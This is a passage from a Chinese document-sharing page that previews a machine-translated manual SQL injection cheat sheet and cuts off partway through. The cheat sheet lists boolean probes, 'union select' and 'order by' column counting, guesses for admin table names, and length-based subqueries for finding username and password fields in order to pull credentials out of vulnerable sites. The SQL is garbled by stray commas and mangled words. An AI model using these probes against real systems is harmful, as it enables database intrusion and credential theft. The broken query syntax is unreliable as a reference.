网站大量收购独家精品文档,联系QQ:2885784924

手动注入(Manual injection).doc

  1. 1、本文档共23页,可阅读全部内容。
  2. 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
手动注入(Manual injection) Content: 1. to determine whether there is a SQL injection vulnerability Plus Plus and 1=1 Plus and 1=2 2.SQL query And 1=1 1=2 And exists (select * from admin) And exists (select, username, from, admin) And exists (select, passwore, from, admin) Order by 20 Union, select, 1,2,3,4, from, admin The most commonly used SQL query syntax: SELECT [column name] [column name 2] FROM [table name] WHERE [restrictive conditions] Cases: SELECT * FROM Dv_User Where UserID=1 Represents all the information about query UserID 1. To update: [UPDATE] SET [table name column name]= new value WHERE [restrictive conditions] Examples: UPDATE, Dv_User, set, [UserPassword]=, 965eb72c92a549dd, WHERE, UserName=, admin,... This statement will put the Dv_User in the UserName table for the line for admin UserPassword value 965eb72c92a549dd. Delete: DELETE FROM [table name] WHERE [restrictive conditions] Examples: DELETE, FROM, Dv_User, WHERE, UserName=, test Delete the row where the user name is test from the Dv_User table ======================================================================================================================================================================= =========== 1. to determine whether the injection point ; and, 1=1, and, 1=2 2. guessing tables: common tables: admin, adminuser, user, pass, password, and so on And 0 (select count (*) from *) And 0 (select count (*) from, admin) - determine whether there is a table of admin 3., guess the number of accounts, if you encounter 0, return the correct page, 1 return error page, indicating that the number of accounts is 1 And 0 (select count (*) from admin) And 1 (select count (*) from admin) 4. guess the field name in the len () bracket, plus the name of the field we think of And, 1= (select, count (*), from, admin, where, len (*) 0) - And, 1= (select, count (*), from, admin, where, len (user field name name) 0) And, 1= (select, count (*), from, admin, where, len (_blank, password field name, p

文档评论(0)

f8r9t5c + 关注
实名认证
内容提供者

该用户很懒,什么也没介绍

版权声明书
用户编号:8000054077000003

1亿VIP精品文档

相关文档